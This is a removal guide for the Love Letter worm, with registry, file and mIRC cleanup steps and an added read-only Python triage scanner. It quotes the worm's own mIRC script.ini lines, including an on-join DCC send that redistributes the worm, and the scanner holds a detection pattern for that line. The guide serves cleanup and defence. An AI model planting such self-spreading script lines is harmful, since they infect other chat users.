Removing Love Letter virus
Since most of the antivirus companies' web sites are severely crowded right now, here are some simple instructions for manually cleaning the virus's damage off the computer.
Cleaning the registry:
Delete the following Windows Registry entries by clicking on "Start", then "Run", then typing in "regedit" (no quotes). If regedit has been removed from your system by your system administrators, contact them:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
Search your machine by right-clicking "My Computer", choosing "Find", and typing "winfat32.exe" (no quotes) in the "find what" box. If that file is present, also delete the following registry entry:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
Change the value of the following registry key to your favorite web site (http://www.forensics-intl.com, :)):
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
Cleaning up the Love-Bug "droppings" it left on your drives:
Use the find technique listed above to locate "LOVE-LETTER-FOR-YOU.HTM" and "LOVE-LETTER-FOR-YOU.TXT". These should be found on non-removable drives only. Delete these files wherever you find them. Do NOT open them... just select all occurrences in the resulting list by highlighting them and delete them.
Cleaning up rewritten files that are now merely copies of the virus: All files of the types listed below have been changed. They have been overwritten by copies of the virus and must be deleted. Your original data can only be retrieved via data recovery methods. The virus's author wrote it on the assumption that most Windows users hide file extensions (which is the default behavior of Windows). The filename extension is now ".vbs", which is run by the VB Scripting utility internal to Windows.
Furthermore, the registry association between these file types and the program that opens them has been changed. Every time you double-click one of the files listed below, Explorer will run the virus all over again. This makes it inconvenient to eradicate after even a few minutes of normal use by the user.
File Types: css, jpg, jpeg, js, jse, sct, hta, mp3, mp2, vbs, vbe, wsh
Find those file types by using the "Find" technique listed above and typing "*.(ext).vbs" (no quotes, and replace (ext) with the appropriate three-letter extension). Once you find them, delete them. You may want to keep a list of the files you deleted, so that later you know why the document, graphic, etc. you had yesterday is now gone.
Once the antivirus companies release their updates (and their site traffic slows down), this will be done much more gracefully, because the virus can then be surgically extracted from within the executable. For those who absolutely MUST keep a crucial file, use DiskEdit against the files which, by virtue of their file type, you believe to be infected. You will see that the virus has appended itself to some of the files and totally overwritten the others. You can carve out the malignancy using Symantec's DiskEdit. Use caution.
System administrators, beware that if a user has a network drive mounted as a share on their system, the shared drive may have infected files as well.
Cleaning up mIRC:
If you have Mardam-Bey's mIRC Internet Relay Chat client installed on your system (you can check this by using the find technique listed above and searching for "mirc.ini"), then a script has been added to the mIRC subdirectory that will REDISTRIBUTE the virus the next time you join an IRC channel. The rewritten script is called "script.ini". Check this file for the occurrence of the following lines:
[script]
mIRC Script
Please dont edit this script... mIRC will corrupt, if mIRC will corrupt...
WINDOWS will affect and will not run correctly. Thanks
Khaled Mardam-Bey
http://www.mirc.com
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM
Those are the lines the worm appends to any existing script.ini for mIRC. Khaled's English is better than mine... these lines were NOT written by him. Either delete those lines, or delete script.ini altogether if you never customized it.
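The file search and the script.ini check above, as an added read-only triage script (not part of the original advisory, and not the worm's code): it walks a drive and reports the dropped files, the name.<ext>.vbs copies, and any mIRC script.ini carrying the appended DCC line, so you can build the deletion list the advisory recommends before touching anything; the registry steps stay with regedit as described. Assumes Python 3 on the machine being inspected; the sample script.ini at the bottom is constructed for a dry run.

```python
import os
import re
import sys
from pathlib import PureWindowsPath

# Indicators from the advisory above (dropped names, the *.<ext>.vbs pattern, the mIRC lines).
OVERWRITTEN_EXTS = {"css", "jpg", "jpeg", "js", "jse", "sct", "hta",
                    "mp3", "mp2", "vbs", "vbe", "wsh"}
DROPPED_NAMES = {"love-letter-for-you.htm", "love-letter-for-you.txt", "winfat32.exe"}
MIRC_MARKER = re.compile(r"dcc send \$nick .*love-letter-for-you\.htm", re.IGNORECASE)

def classify_name(path):
    """'dropped' for the worm's own files, 'overwritten' for name.<ext>.vbs, else None."""
    name = PureWindowsPath(path).name.lower()   # accepts '\' or '/' separators
    if name in DROPPED_NAMES:
        return "dropped"
    parts = name.rsplit(".", 2)                 # "photo.jpg.vbs" -> ["photo", "jpg", "vbs"]
    if len(parts) == 3 and parts[2] == "vbs" and parts[1] in OVERWRITTEN_EXTS:
        return "overwritten"
    return None                                 # a lone *.vbs is not evidence by itself

def mirc_script_tainted(script_ini_text):
    """True if a script.ini carries the worm's appended on-JOIN DCC send line."""
    return any(MIRC_MARKER.search(line) for line in script_ini_text.splitlines())

def scan_tree(root):
    """Walk a drive read-only and list what the advisory says to delete or edit."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            kind = classify_name(path)
            if kind:
                findings.append((kind, path))
            if fname.lower() == "script.ini":   # mIRC script, wherever mIRC lives
                try:
                    with open(path, errors="replace") as fh:
                        if mirc_script_tainted(fh.read()):
                            findings.append(("mirc-script", path))
                except OSError:
                    pass                        # unreadable file: skip it, keep going
    return findings

# Constructed sample of a script.ini carrying the three appended lines, for a dry run.
SAMPLE_SCRIPT_INI = ("[script]\nn0=on 1:JOIN:#:{\nn1= /if ( $nick == $me ) { halt }\n"
                     'n2= /.dcc send $nick "&dirsystem&"\\LOVE-LETTER-FOR-YOU.HTM\n')
if __name__ == "__main__":
    print("sample script.ini tainted:", mirc_script_tainted(SAMPLE_SCRIPT_INI))  # True
    for kind, path in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "C:\\"):
        print(kind, path)
```

Run it with the drive root as the only argument; it prints one line per finding and never deletes or modifies a file.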
Reboot your Windows machine. Keeping the list of files that were overwritten will assist in debugging any problems which might occur thereafter.